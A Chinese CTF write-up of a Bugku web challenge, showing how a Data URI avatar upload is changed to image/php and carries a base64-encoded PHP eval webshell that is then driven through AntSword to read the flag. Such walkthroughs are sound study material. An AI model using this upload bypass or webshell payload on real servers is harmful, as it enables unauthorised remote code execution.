Bugku-web题目-xxx二手交易市场

关于bugku题目:xxx二手交易市场,打开题目,先注册一个账号。

随后登录账号

看了一下感觉有头像上传的漏洞点,打开bp,抓取上传头像的那个包

头像上传漏洞点,rce + webshell:

抓包后发现"image=data:image/jpeg;base64,<data>(跟着一大堆乱七八糟编码)"

识别Data URI格式,这就是标准的Data URI 格式:data:\;base64,<data>

原image/jpeg被替换成image/php,方便植入并执行webshell

payload采用"image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="(URL参数形式),解码后"image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="

在bp的repeater模块中替换并发送了包之后,查看response(响应),可以从data中看到一个路径,使用它返回的路径,在蚁剑中进行连接。

成功进入蚁剑之后,打开虚拟终端,输入"find / -name flag 2>/dev/null"即可找到flag的路径(/var/www/html/flag )

那么此时先将路径回到根目录,"cd /"

再执行"cd /var/www/html"

最后"cat flag"即可得到flag

相关推荐
chengbei1217 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
技术不好的崎鸣同学19 小时前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全
磐时信息技术20 小时前
GB 44495/44496正式施行:智能网联汽车信息安全与软件升级进入强制合规阶段
网络安全·信息安全·汽车·gb44495·gb44496
AI创界者21 小时前
【实战演练】基于 Kali Linux 的自动化漏洞扫描与安全加固指南
网络·安全·web安全
技术不好的崎鸣同学1 天前
[ACTF2020 新生赛]Exec 思路及解法
算法·安全·web安全
被克制了2 天前
安全协议设计与分析(2)
网络安全·密码学·安全协议
云水一下2 天前
DVWA从入门到精通(十一):XSS (Stored)(存储型XSS)
web安全·xss·dvwa·存储型
介一安全2 天前
【SRC】基础思路篇10:越权与未授权访问完全指南
web安全·安全性测试·src·越权
Chockmans2 天前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
四月天433 天前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全